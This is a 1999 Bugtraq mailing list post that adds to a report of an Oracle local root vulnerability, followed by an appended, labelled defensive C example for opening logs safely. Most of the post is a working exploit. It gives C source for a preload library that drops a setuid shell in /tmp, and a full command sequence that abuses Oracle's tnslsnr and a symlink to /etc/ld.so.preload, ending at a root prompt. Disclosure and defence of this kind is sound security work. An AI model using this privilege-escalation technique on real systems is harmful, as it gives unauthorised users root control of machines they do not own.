Bugtraq mailing list archives
Re: Oracle 8 root exploit
From: martinmv () HORNET CZ (Martin Mevald)
Date: Mon, 15 Nov 1999 16:51:54 +0100
Greetings,

Oracle 7.3.4 is vulnerable too.

$ uname -a
SunOS sun450 5.6 Generic_105181-12 sun4u sparc SUNW,Ultra-4

---

Linux:

Oracle version: 8.0.5

There isn't dbsnmp with suid bit on Linux. There is tnslsnr. Program dump
file listener.log:

open("listener.log", O_WRONLY|O_APPEND|O_CREAT, 0666)

Exploit:

oracle-ex.c
--------------------------
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init()
{
    if (!geteuid())
    {
        remove("/etc/ld.so.preload");
        execl("/bin/bash","bash","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);
    }
}
---------------------------

$ gcc -o oracle-ex.o -c oracle-ex.c -fPIC
$ gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 oracle-ex.o -nostartfiles
$ unset ORACLE_HOME
$ umask 0000
$ ln -s /etc/ld.so.preload /tmp/listener.log
$ /u01/app/oracle/product/8.0.5/bin/tnslsnr
$ echo /tmp/libno_ex.so.1.0 >/etc/ld.so.preload
$ telnet localhost
Trying ...
Connected to localhost.localdomain.
Escape character is '^]'.
Connection closed by foreign host.
$ ./xxxx
#

Martin Mevald, martinmv () hornet cz

On Sat, 13 Nov 1999, Tellier, Brock wrote:
Greetings,

OVERVIEW
A vulnerability exists in Oracle 8.1.5 for UN*X which may allow any user to
obtain root privileges.
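
Added example, not part of the original post and not Oracle's code: the open() call quoted in the message follows a symlink named listener.log and lets the caller's umask decide the mode of the file it creates. One way a privileged program can open its log instead, in C; the names open_log_safely and self_check and the temporary paths are assumptions made for this illustration.

```c
#define _GNU_SOURCE 1
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open a log file from privileged code without following a symlink in the
 * last path component and without letting the caller's umask widen the mode.
 * Returns an fd, or -1 if the path is refused. */
int open_log_safely(const char *path)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW | O_CLOEXEC, 0600);
    if (fd < 0)
        return -1;              /* ELOOP when path is a symlink */
    /* Must be a regular, singly linked file owned by our effective uid. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_nlink != 1 || st.st_uid != geteuid()) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed scenario: "listener.log" is a symlink to another file.
 * Returns 0 when the symlink is refused, its target is not created, and a
 * plain log file is still opened with mode 0600 under umask 0. */
int self_check(void)
{
    char dir[] = "/tmp/logdemoXXXXXX", lnk[64], target[64], plain[64];
    struct stat st;
    if (!mkdtemp(dir)) return -1;
    snprintf(lnk, sizeof lnk, "%s/listener.log", dir);
    snprintf(target, sizeof target, "%s/target", dir);
    snprintf(plain, sizeof plain, "%s/plain.log", dir);
    if (symlink(target, lnk) != 0) return -1;
    mode_t old = umask(0);
    int refused = open_log_safely(lnk);
    int fd = open_log_safely(plain);
    umask(old);
    int ok = refused == -1 && stat(target, &st) != 0 && fd >= 0 &&
             fstat(fd, &st) == 0 && (st.st_mode & 0777) == 0600;
    if (fd >= 0) close(fd);
    unlink(lnk); unlink(plain); rmdir(dir);
    return ok ? 0 : 1;
}

int main(void) { return self_check(); }
```

O_NOFOLLOW only guards the final path component, so a setuid program should also avoid writing its log relative to a directory the invoking user controls.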